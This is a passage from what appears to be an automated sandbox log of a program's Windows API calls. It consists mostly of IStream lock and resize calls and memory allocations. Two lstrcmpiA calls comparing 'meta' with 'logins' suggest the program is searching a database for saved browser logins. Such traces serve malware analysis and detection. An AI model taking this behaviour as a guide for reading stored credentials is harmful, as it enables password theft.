cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db33) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db33) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x20, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52db30) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x3c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x28, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x64, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x64, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad7) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x65, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x67, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x69, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x6b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad7) returned 0x0 [0590.175] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2ede058 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x6c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x6e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x70, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x72, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x74, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x76, cb=0x0, dwLockType=0x0) returned 0x0 [0590.175] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.175] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x78, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x7a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x57ea78, libNewSize=0x52dad6) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x767, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x767, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x768, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.176] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.176] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x57ea78, libOffset=0x769, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.176] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.176] LocalFree (hMem=0x5e6798) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.176] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.176] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.176] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.176] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.177] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.177] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.177] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0xd1) returned 0x5dbdf0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x639fe0, libNewSize=0x5dbdf0) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0xd9) returned 0x2ed0148 [0590.177] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.177] LocalFree (hMem=0x56ff38) returned 0x0 [0590.177] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.177] lstrcmpiA (lpString1="meta", lpString2="logins") returned 1 [0590.177] LocalFree (hMem=0x58d970) returned 0x0 [0590.177] LocalFree (hMem=0x58d548) returned 0x0 [0590.177] LocalFree (hMem=0x58d840) returned 0x0 [0590.177] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.177] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.177] LocalFree (hMem=0x570078) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x7cf, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x7cf, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x7d0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.177] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.177] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x57ea78, libOffset=0x7d1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.177] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.177] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.177] LocalFree (hMem=0x5e6798) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.177] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0590.178] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x56ffd8) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.178] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.178] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.178] IStream:LockRegion (This=0x639fe0, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.178] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.178] LocalFree (hMem=0x570078) returned 0x0 [0590.178] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.178] lstrcmpiA (lpString1="meta", lpString2="logins") returned 1 [0590.178] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.178] LocalFree (hMem=0x5d1978) returned 0x0 [0590.178] LocalFree (hMem=0x58d840) returned 0x0 [0590.178] LocalFree (hMem=0x58d548) returned 0x0 [0590.178] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.178] LocalFree (hMem=0x56ff38) returned 0x0 [0590.178] IStream:LockRegion (This=0x57ea78, libOffset=0x487, cb=0x0, dwLockType=0x0) returned 0x0 [0590.178] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x487, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x488, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x489, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.179] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.179] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x57ea78, libOffset=0x48a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.179] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.179] LocalFree (hMem=0x5e6798) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion 